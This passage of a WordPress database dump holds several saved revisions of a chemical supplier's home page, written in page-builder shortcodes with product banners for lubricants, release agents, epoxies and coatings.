id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 14:17:50', '2017-05-01 14:17:50', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4108, 2, '2017-05-01 14:30:46', '2017-05-01 14:30:46', '', 'shutterstock_479218552', '', 'inherit', 'closed', 'closed', '', 'shutterstock_479218552', '', '', '2017-05-01 14:30:46', '2017-05-01 14:30:46', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_479218552.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4109, 2, '2017-05-01 14:37:39', '2017-05-01 14:37:39', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="13" height="1-4"]\n\n[ux_banner height="500px" bg="3986" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="Industrial & medical coatings" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 14:37:39', '2017-05-01 14:37:39', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4110, 2, '2017-05-01 14:40:12', '2017-05-01 14:40:12', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="3986" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="Industrial & medical coatings" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 14:40:12', '2017-05-01 14:40:12', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4111, 2, '2017-05-01 14:42:37', '2017-05-01 14:42:37', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="5"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="3986" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="Industrial & medical coatings" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_image id="2475"]\n\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 14:42:37', '2017-05-01 14:42:37', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4112, 2, '2017-05-01 15:05:10', '2017-05-01 15:05:10', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="5"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4104" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_overlay="rgba(0, 0, 0, 0.31)"]\n\n[text_box width="62" width__sm="60" position_x="5" text_align="left"]\n\n[button text="CONFORMAL COATINGS" size="large"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 15:05:10', '2017-05-01 15:05:10', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4113, 2, '2017-05-01 15:15:23', '2017-05-01 15:15:23', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="5"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4104" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the 